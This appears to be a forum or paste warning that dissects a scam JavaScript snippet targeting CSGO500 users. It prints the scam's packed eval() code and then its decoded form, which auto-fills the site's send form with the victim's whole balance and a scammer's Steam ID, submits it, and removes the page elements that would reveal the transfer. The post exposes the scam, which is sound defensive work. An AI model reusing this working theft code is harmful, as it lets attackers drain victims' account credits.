- The paste that I'm replying to is an obvious scam that will steal all
- your CSGO500 credits.
- The credits will go to this person: https://steamcommunity.com/profiles/76561198801125925
- If you're interested as to how you can come to this conclusion by yourself,
- please keep on reading:
- Most of the code supplied by the paste is commented, leaving only those
- lines to be executed:
- document.getElementsByClassName("nav-permalink")[2].click();
- var hash_1 = 765;var hash_2=6119;var hash_3=82404;var hash_4=11300;
- document.getElementsByClassName("bigtext")[1].style.color="#c8354e";
- eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3 h=b.c("h").e;3 H=h.P(/,/g,\'\');b.c("f-N-d").F=H;3 D=7;3 J=6;3 O=5;3 M=6;3 L=1;3 z=1;3 s=9;3 t=8;3 u=8;3 v=0;3 C=1;3 I=1;3 y=2;3 x=5;3 A=9;3 w=2;3 B=5;b.c("f-K-d").F=D.4()+J.4()+O.4()+M.4()+L.4()+z.4()+s.4()+t.4()+u.4()+v.4()+C.4()+I.4()+y.4()+x.4()+A.4()+w.4()+B.4();b.T(\'12-10-Q Z\')[1].14();$(\'#f-N-d\').a();$(\'#f-K-d\').a();$(\'#13-11-d\').a();$(\'#X-S\').a();$(\'#E-j-R\').a();$(\'#E-j\').a();$(\'#G-Y\').a();$(\'#G-j\').a();b.c("h").e="k r q n l m p o i";b.c("U").e="k r q n l m p o i";b.c("W-V").e="k r q n l m p o i";',62,67,'|||var|toString||||||remove|document|getElementById|input|innerText|send||balance|hack|table|Open|csgo500|to|on|the|start|Page|Account|color_red5_1|color_red5|color_blue1|color_blue2|color_gold3|color_gold1|color_blue5|color_red4|color_gold2|color_gold4|color_blue3|color_grey1|bet|value|sends|balance1|color_blue4|color_grey2|openid|color_red3|color_red2|bux|color_red1|replace|btn|body|details|getElementsByClassName|hash|toggle|autobetter|account|loader|noselect|content|url|slim|trade|click'.split('|'),0,{}));
- The last line is most important, and obfuscated in the shittiest of manners.
- Simply replacing the eval (javascript function executing whatever code is
- passed in a string as a parameter) call by a console.log call will reveal
- the following code:
- var balance = document.getElementById("balance").innerText;
- var balance1 = balance.replace(/,/g, '');
- document.getElementById("send-bux-input").value = balance1;
- var color_grey1 = 7;
- var color_grey2 = 6;
- var color_red1 = 5;
- var color_red2 = 6;
- var color_red3 = 1;
- var color_red4 = 1;
- var color_red5_1 = 9;
- var color_red5 = 8;
- var color_blue1 = 8;
- var color_blue2 = 0;
- var color_blue3 = 1;
- var color_blue4 = 1;
- var color_blue5 = 2;
- var color_gold1 = 5;
- var color_gold2 = 9;
- var color_gold3 = 2;
- var color_gold4 = 5;
- document.getElementById("send-openid-input").value = color_grey1.toString() + color_grey2.toString() + color_red1.toString() + color_red2.toString() + color_red3.toString() + color_red4.toString() + color_red5_1.toString() + color_red5.toString() + color_blue1.toString() + color_blue2.toString() + color_blue3.toString() + color_blue4.toString() + color_blue5.toString() + color_gold1.toString() + color_gold2.toString() + color_gold3.toString() + color_gold4.toString();
- document.getElementsByClassName('slim-content-btn noselect')[1].click();
- $('#send-bux-input').remove();
- $('#send-openid-input').remove();
- $('#trade-url-input').remove();
- $('#account-details').remove();
- $('#bet-table-body').remove();
- $('#bet-table').remove();
- $('#sends-loader').remove();
- $('#sends-table').remove();
- document.getElementById("balance").innerText = "Open Account Page on csgo500 to start the hack";
- document.getElementById("hash").innerText = "Open Account Page on csgo500 to start the hack";
- document.getElementById("autobetter-toggle").innerText = "Open Account Page on csgo500 to start the hack";
- This seems to be getting the amount of credits you've got, and trying to send
- them to an unknown user when you access the "Account page" as prompted by
- the last few lines.
- Once cleaned, we get the following line setting the "send-openid-input" input
- value:
- document.getElementById("send-openid-input").value = "76561198801125925";
- Which leads us to njrat1337 ( https://steamcommunity.com/profiles/76561198801125925 )